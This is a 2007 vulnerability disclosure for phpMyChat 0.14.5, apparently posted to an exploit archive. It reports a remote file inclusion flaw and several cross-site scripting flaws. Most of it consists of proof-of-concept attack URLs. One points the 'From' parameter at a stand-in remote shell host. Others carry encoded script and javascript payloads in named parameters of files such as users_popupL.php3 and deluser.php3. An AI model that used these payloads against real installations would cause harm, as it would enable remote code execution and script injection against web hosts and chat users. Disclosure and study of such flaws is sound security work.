RFI and Multiple XSS in PhpMyChat

2007.12.10

Credit: beenudel1986

Risk: High

Local: No

Remote: Yes

CVE: CVE-2007-6296 | CVE-2007-6297

CWE: CWE-98

~~~~~~~~~~~~~~~~Application : phpMyChat 0.14.5~~~~~~~~~~~~~~~~

Email ; beenudel1986 (at) gmail (dot) com [email concealed]

Website: http://phpmychat.sourceforge.net/

Many webhosting companies are offering this version of phpMychat in their cpanel :)

----------------------------

|   Remote File Inclusion:  |

----------------------------

http://localhost/path_to_phpMychat/chat/users_popupL.php3

Parameter = From

POC = http://localhost/path_to_phpMychat/chat/users_popupL.php3?From=http://ev
ilshell

---------------

|Multiple XSS |

---------------

a.Vulnerable URL: http://localhost/phpmychat/chat/deluser.php3

Parameter = LIMIT

POC =http://localhost/phpmychat/chat/config/start_page.css.php3?Charset=iso-
8859-1&medium=10&FontName= >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%2
3x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Suc
cessfull%26%23x20;XSS%26%23x20;Test%26%23x20;Here%26quot;)>

b. Vulnerable URL: http://www.localhost/mychat/chat/deluser.php3

Parameter = LIMIT

POC = http://www.localhost/phpmychat/chat/deluser.php3?L=english&Link=&LIMIT=>
"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23
x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Succ
essfull%26%23x20;XSS%26%23x20;Test%26%23x20;Here%26quot;)>&AUTH_USERNAME
=&AUTH_PASSWORD=

c. Vulnerable URL: http://www.localhost/phpmychat/chat/edituser.php3

Parameter= Link , still lokking for pOC ;)

d.Vulnerable URL= http://localhost/phpmychat/chat/users_popupL.php3

Parameter = LastCheck

POC = http://localhost/mychat/chat/users_popupL.php3?From=..%2FphpMyChat.php3&
L=english&LastCheck= "></STYLE><STYLE>@import"javascript:alert('This%20XSS%20Is%20Xss')";</ST
YLE>'

e. Vulnerable URL: http://localhost/phpmychat/chat/users_popupL.php3

Parameter = B

POC =http://localhost/phpmychat/chat/users_popupL.php3?From=..%2FphpMyChat.p
hp3&L=english&LastCheck=1196698786&B= >"><script>alert("This%20XSS%20Test%20Successful")</script>

f.Vulnerable URL: http://localhost/phmychat/chat/users_popupL.php3

Parameter =From

POC = http://localhost/phpmychat/chat/users_popupL.php3?From=>"><script>alert(
"This%20XSS%20Test%20Successful")</script>

g. Vulnerable URL = http://localhost/phpmychat/chat/config/start_page.css.php3

Parameter = FontName

Parameter = medium

h. Vulnerable URL: http://localhost/phpmychat/chat/config/style.css.php3

Parameter = FontName

Parameter = medium

POC = http://localhost/phpmychat//mychat/chat/config/style.css.php3?Charset=is
o-8859-1&medium=10&FontName=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x
76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74
;%26%23x3a;alert(%26quot;This%26%23x20;XSS%26%23x20;Test%26%23x20;Succes
sful%26quot;)>

Try the second one urself or mail me to have the POC :P

~~~~~~~~~~~~~~~~~~greetz to mah friend d3 , icqbomber , baltazar~~~~~~~~~~~~~~~~~~

--

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

RFI and Multiple XSS in PhpMyChat

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.